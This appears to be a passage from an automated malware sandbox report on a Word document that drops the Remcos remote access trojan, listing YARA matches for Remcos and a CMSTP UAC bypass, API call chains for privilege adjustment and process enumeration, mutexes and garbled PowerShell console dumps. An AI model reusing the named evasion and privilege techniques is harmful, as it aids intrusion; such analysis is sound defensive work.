                  Source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: plug[1].scr.2.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: plugman23456.scr.2.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: znlzneAxBVd.exe.5.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: plug[1].scr.2.dr, SliderControl.csBase64 encoded string: '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'
                  Source: plugman23456.scr.2.dr, SliderControl.csBase64 encoded string: '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'
                  Source: znlzneAxBVd.exe.5.dr, SliderControl.csBase64 encoded string: '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'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, gVPP59x0g7rK6ZWOvl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, gVPP59x0g7rK6ZWOvl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, gVPP59x0g7rK6ZWOvl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: bhvEBA7.tmp.21.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@30/27@3/3
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,21_2_004182CE
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,23_2_00410DE1
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,25_2_00417952
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,21_2_00418758
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,21_2_00413D4C
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,21_2_0040B58D
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,25_2_0041AA4A
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$fer ZI-0428.doc
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMutant created: \Sessions\1\BaseNamedObjects\BvhBtyDlVbLnqYhZtgyQy
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMutant created: \Sessions\1\BaseNamedObjects\Rmc-BW3KDF
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8258.tmp
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................|+.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................+.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........,.........................s.................... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................L,.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................d,.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......,.........................s....................$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................!-.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................G-.........................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................._-.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................-.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."-.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................<-.........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................`-.........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................x-.........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........-.........................s............X....... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......-.........................s............X.......$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................+..........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............X.......2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................S..........................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............X...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............X...............................
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................@.'...............'.....(.P..............................&......................................................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................*S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................>S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................JS.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........rS.........................s............h....... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......S.........................s............h.......$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............h.......2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................T.........................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................T.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................4T.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................BT.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................^.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................._.........................s............x...............................
